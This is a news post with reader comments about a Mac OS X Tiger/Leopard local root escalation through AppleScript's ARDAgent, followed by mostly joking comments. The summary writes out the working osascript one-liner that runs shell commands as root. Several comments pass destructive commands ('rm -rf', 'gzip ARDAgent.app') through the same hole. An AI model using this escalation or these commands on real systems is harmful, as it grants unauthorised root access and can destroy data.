Mac OS X Root Escalation Through AppleScript
An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.
who needs a source, it works. tried on my mac, output is: root
/" and
so i tried replacing "whoami" with "rm -rf
!@#ca$a%H&(
+++NO CARRIER
More Twoson than Cupertino
My IQ is 162 and I didn't get your joke. Just how smart do you have to be to get that one?
Modding Trolls +1 inciteful since 1999
Is it really bad for an attacker to find out who I am using this "whoami" thingy?
Sarcasm does not make you more handsome or bring you favor with the ladies.
If you mod me Overrated, you are admitting that you have no penis.
Yeah, right.
Mac: Oh %$#& %$#& %$#& %$#&.
PC: I can relate.
Mac: No!! %$#& %$#& %$#&
PC: Don't feel so glum, Mac, it happens to everyone once in a while. Look at it this way -- its a sign you're growing up.
Mac: NOOOOOOOOOOOOOOOOOOOOOOOOOO.
PC: You know, they can do wonderful things these days with firewall software.
Mac: I want to cut myself.
PC: Not a good idea as a root user, Mac.
Mac: *glowers*
PC: I only kid because I love you.
Help poke pirates in the eyepatch, arr.
Why use sudo when you could just use the ARDAgent hack instead?
osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';
Nononono....
it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';